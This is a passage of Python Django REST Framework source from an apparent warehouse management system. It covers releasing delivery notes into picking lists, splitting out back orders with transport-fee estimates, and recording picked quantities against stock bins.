goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + bin_can_pick_qty
dn_detail_list[i].dn_status = 3
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
break
elif dn_need_pick_qty < bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[j].pick_qty + \
dn_need_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - \
dn_need_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + \
dn_need_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=dn_need_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + dn_need_pick_qty
dn_detail_list[i].dn_status = 3
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
break
else:
break
elif bin_can_pick_qty == 0:
continue
else:
continue
else:
continue
elif can_pick_qty == 0:
if qs[v].back_order_label == False:
goods_qty_change.back_order_stock = goods_qty_change.back_order_stock + dn_detail_list[
i].goods_qty
back_order_goods_volume = round(goods_detail.unit_volume * dn_detail_list[i].goods_qty, 4)
back_order_goods_weight = round(
(goods_detail.goods_weight * dn_detail_list[i].goods_qty) / 1000, 4)
back_order_goods_cost = round(goods_detail.goods_price * dn_detail_list[i].goods_qty, 2)
back_order_list.append(DnDetailModel(dn_code=back_order_dn_code,
dn_status=2,
customer=qs[v].customer,
goods_code=dn_detail_list[i].goods_code,
goods_qty=dn_detail_list[i].goods_qty,
goods_weight=back_order_goods_weight,
goods_volume=back_order_goods_volume,
goods_cost=back_order_goods_cost,
creater=self.request.auth.name,
back_order_label=True,
openid=self.request.auth.openid,
create_time=dn_detail_list[i].create_time))
back_order_list_label = 1
total_weight = total_weight - back_order_goods_weight
total_volume = total_volume - back_order_goods_volume
total_cost = total_cost - back_order_goods_cost
back_order_goods_weight_list.append(back_order_goods_weight)
back_order_goods_volume_list.append(back_order_goods_volume)
back_order_goods_cost_list.append(back_order_goods_cost)
dn_detail_list[i].is_delete = True
dn_detail_list[i].save()
goods_qty_change.save()
else:
continue
else:
continue
if picking_list_label == 1:
if back_order_list_label == 1:
back_order_total_volume = sumOfList(back_order_goods_volume_list,
len(back_order_goods_volume_list))
back_order_total_weight = sumOfList(back_order_goods_weight_list,
len(back_order_goods_weight_list))
back_order_total_cost = sumOfList(back_order_goods_cost_list,
len(back_order_goods_cost_list))
customer_city = customer.objects.filter(openid=self.request.auth.openid,
customer_name=str(qs[v].customer),
is_delete=False).first().customer_city
warehouse_city = warehouse.objects.filter(
openid=self.request.auth.openid).first().warehouse_city
transportation_fee = transportation.objects.filter(
Q(openid=self.request.auth.openid, send_city__icontains=warehouse_city,
receiver_city__icontains=customer_city,
is_delete=False) | Q(openid='init_data', send_city__icontains=warehouse_city,
receiver_city__icontains=customer_city,
is_delete=False))
transportation_res = {
"detail": []
}
transportation_back_order_res = {
"detail": []
}
if len(transportation_fee) >= 1:
transportation_list = []
transportation_back_order_list = []
for k in range(len(transportation_fee)):
transportation_cost = transportation_calculate(total_weight,
total_volume,
transportation_fee[k].weight_fee,
transportation_fee[k].volume_fee,
transportation_fee[k].min_payment)
transportation_back_order_cost = transportation_calculate(back_order_total_weight,
back_order_total_volume,
transportation_fee[
k].weight_fee,
transportation_fee[
k].volume_fee,
transportation_fee[
k].min_payment)
transportation_detail = {
"transportation_supplier": transportation_fee[k].transportation_supplier,
"transportation_cost": transportation_cost
}
transportation_back_order_detail = {
"transportation_supplier": transportation_fee[k].transportation_supplier,
"transportation_cost": transportation_back_order_cost
}
transportation_list.append(transportation_detail)
transportation_back_order_list.append(transportation_back_order_detail)
transportation_res['detail'] = transportation_list
transportation_back_order_res['detail'] = transportation_back_order_list
DnListModel.objects.create(openid=self.request.auth.openid,
dn_code=back_order_dn_code,
dn_status=2,
total_weight=back_order_total_weight,
total_volume=back_order_total_volume,
total_cost=back_order_total_cost,
customer=qs[v].customer,
creater=self.request.auth.name,
bar_code=bar_code,
back_order_label=True,
transportation_fee=transportation_back_order_res,
create_time=qs[v].create_time)
scanner.objects.create(openid=self.request.auth.openid, mode="DN", code=back_order_dn_code,
bar_code=bar_code)
PickingListModel.objects.bulk_create(picking_list, batch_size=100)
DnDetailModel.objects.bulk_create(back_order_list, batch_size=100)
qs[v].total_weight = total_weight
qs[v].total_volume = total_volume
qs[v].total_cost = total_cost
qs[v].transportation_fee = transportation_res
qs[v].dn_status = 3
qs[v].save()
elif back_order_list_label == 0:
PickingListModel.objects.bulk_create(picking_list, batch_size=100)
qs[v].dn_status = 3
qs[v].save()
else:
continue
elif picking_list_label == 0:
if back_order_list_label == 1:
DnDetailModel.objects.bulk_create(back_order_list, batch_size=100)
DnListModel.objects.create(openid=self.request.auth.openid,
dn_code=back_order_dn_code,
dn_status=2,
total_weight=qs[v].total_weight,
total_volume=qs[v].total_volume,
total_cost=qs[v].total_cost,
customer=qs[v].customer,
creater=self.request.auth.name,
bar_code=bar_code,
back_order_label=True,
transportation_fee=qs[v].transportation_fee,
create_time=qs[v].create_time)
scanner.objects.create(openid=self.request.auth.openid, mode="DN", code=back_order_dn_code,
bar_code=bar_code)
qs[v].is_delete = True
qs[v].dn_status = 3
qs[v].save()
elif back_order_list_label == 0:
continue
else:
continue
else:
continue
return Response({"detail": "success"}, status=200)
def update(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot Release Order Data Which Not Yours"})
else:
if qs.dn_status == 2:
dn_detail_list = DnDetailModel.objects.filter(openid=self.request.auth.openid,
dn_code=qs.dn_code,
dn_status=2, is_delete=False)
picking_list = []
picking_list_label = 0
back_order_list = []
back_order_list_label = 0
back_order_goods_weight_list = []
back_order_goods_volume_list = []
back_order_goods_cost_list = []
back_order_base_code = DnListModel.objects.filter(openid=self.request.auth.openid, is_delete=False).order_by('-id').first().dn_code
dn_last_code = re.findall(r'\d+', str(back_order_base_code), re.IGNORECASE)
back_order_dn_code = 'DN' + str(int(dn_last_code[0]) + 1).zfill(8)
bar_code = Md5.md5(back_order_dn_code)
total_weight = qs.total_weight
total_volume = qs.total_volume
total_cost = qs.total_cost
for i in range(len(dn_detail_list)):
goods_detail = goods.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code),
is_delete=False).first()
if stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code)).exists():
pass
else:
stocklist.objects.create(openid=self.request.auth.openid,
goods_code=str(goods_detail.goods_code),
goods_desc=goods_detail.goods_desc,
dn_stock=int(dn_detail_list[i].goods_qty))
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(
dn_detail_list[i].goods_code)).first()
goods_bin_stock_list = stockbin.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code),
bin_property="Normal").order_by('id')
can_pick_qty = goods_qty_change.onhand_stock - \
goods_qty_change.inspect_stock - \
goods_qty_change.hold_stock - \
goods_qty_change.damage_stock - \
goods_qty_change.pick_stock - \
goods_qty_change.picked_stock
if can_pick_qty > 0:
if dn_detail_list[i].goods_qty > can_pick_qty:
if qs.back_order_label == False:
dn_pick_qty = dn_detail_list[i].pick_qty
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - \
goods_bin_stock_list[j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_pick_qty = dn_pick_qty + bin_can_pick_qty
goods_qty_change.save()
goods_bin_stock_list[j].save()
elif bin_can_pick_qty == 0:
continue
else:
continue
dn_detail_list[i].pick_qty = dn_pick_qty
dn_back_order_qty = dn_detail_list[i].goods_qty - \
dn_detail_list[i].pick_qty - \
dn_detail_list[i].picked_qty
dn_detail_list[i].goods_qty = dn_pick_qty
dn_detail_list[i].dn_status = 3
goods_qty_change.back_order_stock = goods_qty_change.back_order_stock + \
dn_back_order_qty
back_order_goods_volume = round(goods_detail.unit_volume * dn_back_order_qty, 4)
back_order_goods_weight = round(
(goods_detail.goods_weight * dn_back_order_qty) / 1000, 4)
back_order_goods_cost = round(goods_detail.goods_price * dn_back_order_qty, 2)
back_order_list.append(DnDetailModel(dn_code=back_order_dn_code,
dn_status=2,
customer=qs.customer,
goods_code=dn_detail_list[i].goods_code,
goods_qty=dn_back_order_qty,
goods_weight=back_order_goods_weight,
goods_volume=back_order_goods_volume,
goods_cost=back_order_goods_cost,
creater=self.request.auth.name,
back_order_label=True,
openid=self.request.auth.openid,
create_time=dn_detail_list[i].create_time))
back_order_list_label = 1
total_weight = total_weight - back_order_goods_weight
total_volume = total_volume - back_order_goods_volume
total_cost = total_cost - back_order_goods_cost
dn_detail_list[i].goods_weight = dn_detail_list[i].goods_weight - \
back_order_goods_weight
dn_detail_list[i].goods_volume = dn_detail_list[i].goods_volume - \
back_order_goods_volume
dn_detail_list[i].goods_cost = dn_detail_list[i].goods_cost - \
back_order_goods_cost
back_order_goods_weight_list.append(back_order_goods_weight)
back_order_goods_volume_list.append(back_order_goods_volume)
back_order_goods_cost_list.append(back_order_goods_cost)
goods_qty_change.save()
dn_detail_list[i].save()
else:
dn_pick_qty = dn_detail_list[i].pick_qty
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - \
goods_bin_stock_list[j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_pick_qty = dn_pick_qty + bin_can_pick_qty
goods_qty_change.save()
goods_bin_stock_list[j].save()
elif bin_can_pick_qty == 0:
continue
else:
continue
dn_detail_list[i].pick_qty = dn_pick_qty
dn_back_order_qty = dn_detail_list[i].goods_qty - \
dn_detail_list[i].pick_qty - \
dn_detail_list[i].picked_qty
dn_detail_list[i].goods_qty = dn_pick_qty
dn_detail_list[i].dn_status = 3
back_order_goods_volume = round(goods_detail.unit_volume * dn_back_order_qty, 4)
back_order_goods_weight = round(
(goods_detail.goods_weight * dn_back_order_qty) / 1000, 4)
back_order_goods_cost = round(goods_detail.goods_price * dn_back_order_qty, 2)
back_order_list.append(DnDetailModel(dn_code=back_order_dn_code,
dn_status=2,
customer=qs.customer,
goods_code=dn_detail_list[i].goods_code,
goods_qty=dn_back_order_qty,
goods_weight=back_order_goods_weight,
goods_volume=back_order_goods_volume,
goods_cost=back_order_goods_cost,
creater=self.request.auth.name,
back_order_label=True,
openid=self.request.auth.openid,
create_time=dn_detail_list[i].create_time))
back_order_list_label = 1
total_weight = total_weight - back_order_goods_weight
total_volume = total_volume - back_order_goods_volume
total_cost = total_cost - back_order_goods_cost
dn_detail_list[i].goods_weight = dn_detail_list[i].goods_weight - \
back_order_goods_weight
dn_detail_list[i].goods_volume = dn_detail_list[i].goods_volume - \
back_order_goods_volume
dn_detail_list[i].goods_cost = dn_detail_list[i].goods_cost - \
back_order_goods_cost
back_order_goods_weight_list.append(back_order_goods_weight)
back_order_goods_volume_list.append(back_order_goods_volume)
back_order_goods_cost_list.append(back_order_goods_cost)
dn_detail_list[i].save()
elif dn_detail_list[i].goods_qty == can_pick_qty:
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - goods_bin_stock_list[j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
dn_need_pick_qty = dn_detail_list[i].goods_qty - dn_detail_list[i].pick_qty - dn_detail_list[i].picked_qty
if dn_need_pick_qty > bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + bin_can_pick_qty
goods_bin_stock_list[j].save()
goods_qty_change.save()
elif dn_need_pick_qty == bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + bin_can_pick_qty
dn_detail_list[i].dn_status = 3
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
break
else:
break
elif bin_can_pick_qty == 0:
continue
else:
continue
elif dn_detail_list[i].goods_qty < can_pick_qty:
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - \
goods_bin_stock_list[j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
dn_need_pick_qty = dn_detail_list[i].goods_qty - \
dn_detail_list[i].pick_qty - \
dn_detail_list[i].picked_qty
if dn_need_pick_qty > bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[j].pick_qty + \
bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - \
bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + \
bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + \
bin_can_pick_qty
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
elif dn_need_pick_qty == bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + bin_can_pick_qty
dn_detail_list[i].dn_status = 3
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
break
elif dn_need_pick_qty < bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[j].pick_qty + \
dn_need_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - \
dn_need_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + \
dn_need_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[j].goods_code,
pick_qty=dn_need_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + dn_need_pick_qty
dn_detail_list[i].dn_status = 3
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
break
else:
break
elif bin_can_pick_qty == 0:
continue
else:
continue
elif can_pick_qty == 0:
if qs.back_order_label == False:
goods_qty_change.back_order_stock = goods_qty_change.back_order_stock + dn_detail_list[i].goods_qty
back_order_goods_volume = round(goods_detail.unit_volume * dn_detail_list[i].goods_qty, 4)
back_order_goods_weight = round((goods_detail.goods_weight * dn_detail_list[i].goods_qty) / 1000, 4)
back_order_goods_cost = round(goods_detail.goods_price * dn_detail_list[i].goods_qty, 2)
back_order_list.append(DnDetailModel(dn_code=back_order_dn_code,
dn_status=2,
customer=qs.customer,
goods_code=dn_detail_list[i].goods_code,
goods_qty=dn_detail_list[i].goods_qty,
goods_weight=back_order_goods_weight,
goods_volume=back_order_goods_volume,
goods_cost=back_order_goods_cost,
creater=self.request.auth.name,
back_order_label=True,
openid=self.request.auth.openid,
create_time=dn_detail_list[i].create_time))
back_order_list_label = 1
total_weight = total_weight - back_order_goods_weight
total_volume = total_volume - back_order_goods_volume
total_cost = total_cost - back_order_goods_cost
back_order_goods_weight_list.append(back_order_goods_weight)
back_order_goods_volume_list.append(back_order_goods_volume)
back_order_goods_cost_list.append(back_order_goods_cost)
dn_detail_list[i].is_delete = True
dn_detail_list[i].save()
goods_qty_change.save()
else:
continue
else:
continue
if picking_list_label == 1:
if back_order_list_label == 1:
back_order_total_volume = sumOfList(back_order_goods_volume_list,
len(back_order_goods_volume_list))
back_order_total_weight = sumOfList(back_order_goods_weight_list,
len(back_order_goods_weight_list))
back_order_total_cost = sumOfList(back_order_goods_cost_list,
len(back_order_goods_cost_list))
customer_city = customer.objects.filter(openid=self.request.auth.openid,
customer_name=str(qs.customer),
is_delete=False).first().customer_city
warehouse_city = warehouse.objects.filter(
openid=self.request.auth.openid).first().warehouse_city
transportation_fee = transportation.objects.filter(
Q(openid=self.request.auth.openid, send_city__icontains=warehouse_city,
receiver_city__icontains=customer_city,
is_delete=False) | Q(openid='init_data', send_city__icontains=warehouse_city,
receiver_city__icontains=customer_city,
is_delete=False))
transportation_res = {
"detail": []
}
transportation_back_order_res = {
"detail": []
}
if len(transportation_fee) >= 1:
transportation_list = []
transportation_back_order_list = []
for k in range(len(transportation_fee)):
transportation_cost = transportation_calculate(total_weight,
total_volume,
transportation_fee[k].weight_fee,
transportation_fee[k].volume_fee,
transportation_fee[k].min_payment)
transportation_back_order_cost = transportation_calculate(back_order_total_weight,
back_order_total_volume,
transportation_fee[k].weight_fee,
transportation_fee[k].volume_fee,
transportation_fee[k].min_payment)
transportation_detail = {
"transportation_supplier": transportation_fee[k].transportation_supplier,
"transportation_cost": transportation_cost
}
transportation_back_order_detail = {
"transportation_supplier": transportation_fee[k].transportation_supplier,
"transportation_cost": transportation_back_order_cost
}
transportation_list.append(transportation_detail)
transportation_back_order_list.append(transportation_back_order_detail)
transportation_res['detail'] = transportation_list
transportation_back_order_res['detail'] = transportation_back_order_list
DnListModel.objects.create(openid=self.request.auth.openid,
dn_code=back_order_dn_code,
dn_status=2,
total_weight=back_order_total_weight,
total_volume=back_order_total_volume,
total_cost=back_order_total_cost,
customer=qs.customer,
creater=self.request.auth.name,
bar_code=bar_code,
back_order_label=True,
transportation_fee=transportation_back_order_res,
create_time=qs.create_time)
scanner.objects.create(openid=self.request.auth.openid, mode="DN", code=back_order_dn_code,
bar_code=bar_code)
PickingListModel.objects.bulk_create(picking_list, batch_size=100)
DnDetailModel.objects.bulk_create(back_order_list, batch_size=100)
qs.total_weight = total_weight
qs.total_volume = total_volume
qs.total_cost = total_cost
qs.transportation_fee = transportation_res
qs.dn_status = 3
qs.save()
elif back_order_list_label == 0:
PickingListModel.objects.bulk_create(picking_list, batch_size=100)
qs.dn_status = 3
qs.save()
elif picking_list_label == 0:
if back_order_list_label == 1:
DnDetailModel.objects.bulk_create(back_order_list, batch_size=100)
DnListModel.objects.create(openid=self.request.auth.openid,
dn_code=back_order_dn_code,
dn_status=2,
total_weight=qs.total_weight,
total_volume=qs.total_volume,
total_cost=qs.total_cost,
customer=qs.customer,
creater=self.request.auth.name,
bar_code=bar_code,
back_order_label=True,
transportation_fee=qs.transportation_fee,
create_time=qs.create_time)
scanner.objects.create(openid=self.request.auth.openid, mode="DN", code=back_order_dn_code,
bar_code=bar_code)
qs.is_delete = True
qs.dn_status = 3
qs.save()
return Response({"detail": "success"}, status=200)
else:
raise APIException({"detail": "This Order Does Not in Release Status"})
class DnPickingListViewSet(viewsets.ModelViewSet):
"""
retrieve:
Picklist for pk
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['retrieve']:
return serializers.DNListGetSerializer
else:
return self.http_method_not_allowed(request=self.request)
def retrieve(self, request, pk):
qs = self.get_object()
if qs.dn_status < 3:
raise APIException({"detail": "No Picking List Been Created"})
else:
picking_qs = PickingListModel.objects.filter(openid=self.request.auth.openid, dn_code=qs.dn_code)
serializer = serializers.DNPickingListGetSerializer(picking_qs, many=True)
return Response(serializer.data, status=200)
class DnPickingListFilterViewSet(viewsets.ModelViewSet):
"""
list:
Picklist for Filter
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnPickingListFilter
def get_queryset(self):
if self.request.user:
return PickingListModel.objects.filter(openid=self.request.auth.openid)
else:
return PickingListModel.objects.none()
def get_serializer_class(self):
if self.action in ['list']:
return serializers.DNPickingCheckGetSerializer
else:
return self.http_method_not_allowed(request=self.request)
class DnPickedViewSet(viewsets.ModelViewSet):
"""
create:
Finish Picked
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnListModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['create', 'update']:
return serializers.DNListUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
def create(self, request, pk):
qs = self.get_object()
if qs.dn_status != 3:
raise APIException({"detail": "This dn Status Not Pre Pick"})
else:
data = self.request.data
for i in range(len(data['goodsData'])):
pick_qty_change = PickingListModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
t_code=str(data['goodsData'][i].get('t_code'))).first()
if int(data['goodsData'][i].get('pick_qty')) < 0:
raise APIException({"detail": str(data['goodsData'][i].get('goods_code')) + " Picked Qty Must >= 0"})
else:
if int(data['goodsData'][i].get('pick_qty')) > pick_qty_change.pick_qty:
raise APIException({"detail": str(data['goodsData'][i].get('goods_code')) + " Picked Qty Must Less Than Pick Qty"})
else:
continue
qs.dn_status = 4
for j in range(len(data['goodsData'])):
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(data['goodsData'][j].get('goods_code'))).first()
dn_detail = DnDetailModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
customer=str(data['customer']),
goods_code=str(data['goodsData'][j].get('goods_code'))).first()
bin_qty_change = stockbin.objects.filter(openid=self.request.auth.openid,
t_code=str(data['goodsData'][j].get('t_code'))).first()
pick_qty_change = PickingListModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
t_code=str(data['goodsData'][j].get('t_code'))).first()
qtychangerecorder.objects.create(openid=self.request.auth.openid,
mode_code=dn_detail.dn_code,
bin_name=bin_qty_change.bin_name,
goods_code=bin_qty_change.goods_code,
goods_qty=0 - int(data['goodsData'][j].get('pick_qty')),
creater=self.request.auth.name
)
cur_date = timezone.now().date()
bin_stock = stockbin.objects.filter(openid=self.request.auth.openid,
bin_name=bin_qty_change.bin_name,
goods_code=bin_qty_change.goods_code,
).aggregate(sum=Sum('goods_qty'))["sum"]
cycle_qty = bin_stock - int(data['goodsData'][j].get('pick_qty'))
cyclecount.objects.filter(openid=self.request.auth.openid,
bin_name=bin_qty_change.bin_name,
goods_code=bin_qty_change.goods_code,
create_time__gte=cur_date).update(goods_qty=cycle_qty)
if int(data['goodsData'][j].get('pick_qty')) == pick_qty_change.pick_qty:
goods_qty_change.pick_stock = goods_qty_change.pick_stock - int(data['goodsData'][j].get('pick_qty'))
goods_qty_change.picked_stock = goods_qty_change.picked_stock + int(data['goodsData'][j].get('pick_qty'))
pick_qty_change.picked_qty = int(data['goodsData'][j].get('pick_qty'))
bin_qty_change.pick_qty = bin_qty_change.pick_qty - int(data['goodsData'][j].get('pick_qty'))
bin_qty_change.picked_qty = bin_qty_change.picked_qty + int(data['goodsData'][j].get('pick_qty'))
goods_qty_change.save()
pick_qty_change.save()
bin_qty_change.save()
elif int(data['goodsData'][j].get('pick_qty')) < pick_qty_change.pick_qty:
goods_qty_change.pick_stock = goods_qty_change.pick_stock - dn_detail.pick_qty
goods_qty_change.picked_stock = goods_qty_change.picked_stock + int(data['goodsData'][j].get('pick_qty'))
pick_qty_change.picked_qty = int(data['goodsData'][j].get('pick_qty'))
bin_qty_change.pick_qty = bin_qty_change.pick_qty - pick_qty_change.pick_qty
bin_qty_change.picked_qty = bin_qty_change.picked_qty + int(data['goodsData'][j].get('pick_qty'))
goods_qty_change.save()
pick_qty_change.save()
bin_qty_change.save()
dn_detail.picked_qty = dn_detail.picked_qty + int(data['goodsData'][j].get('pick_qty'))
if dn_detail.dn_status == 3:
dn_detail.dn_status = 4
if dn_detail.pick_qty > 0:
dn_detail.pick_qty = 0
dn_detail.save()
qs.save()
return Response({"Detail": "success"}, status=200)
def update(self, request, *args, **kwargs):
data = self.request.data
qs = self.get_queryset().filter(dn_code=data['dn_code']).first()
if qs.dn_status != 3:
raise APIException({"detail": "This dn Status Not Pre Pick"})
else:
for i in range(len(data['goodsData'])):
pick_qty_change = PickingListModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
t_code=str(
data['goodsData'][i].get('t_code'))).first()
if int(data['goodsData'][i].get('pick_qty')) < 0:
raise APIException(
{"detail": str(data['goodsData'][i].get('goods_code')) + " Picked Qty Must >= 0"})
else:
if int(data['goodsData'][i].get('pick_qty')) > pick_qty_change.pick_qty:
raise APIException(
{"detail": str(
data['goodsData'][i].get('goods_code')) + " Picked Qty Must Not Exceed Pick Qty"})
else:
continue
qs.dn_status = 4
for j in range(len(data['goodsData'])):
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(
data['goodsData'][j].get('goods_code'))).first()
dn_detail = DnDetailModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
goods_code=str(data['goodsData'][j].get('goods_code'))).first()
bin_qty_change = stockbin.objects.filter(openid=self.request.auth.openid,
t_code=str(data['goodsData'][j].get('t_code'))).first()
pick_qty_change = PickingListModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
t_code=str(
data['goodsData'][j].get('t_code'))).first()
qtychangerecorder.objects.create(openid=self.request.auth.openid,
mode_code=dn_detail.dn_code,
bin_name=bin_qty_change.bin_name,
goods_code=bin_qty_change.goods_code,
goods_qty=0 - int(data['goodsData'][j].get('pick_qty')),
creater=self.request.auth.name
)
cur_date = timezone.now().date()
bin_stock = stockbin.objects.filter(openid=self.request.auth.openid,
bin_name=bin_qty_change.bin_name,
goods_code=bin_qty_change.goods_code,
).aggregate(sum=Sum('goods_qty'))["sum"]
cycle_qty = bin_stock - int(data['goodsData'][j].get('pick_qty'))
cyclecount.objects.filter(openid=self.request.auth.openid,
bin_name=bin_qty_change.bin_name,
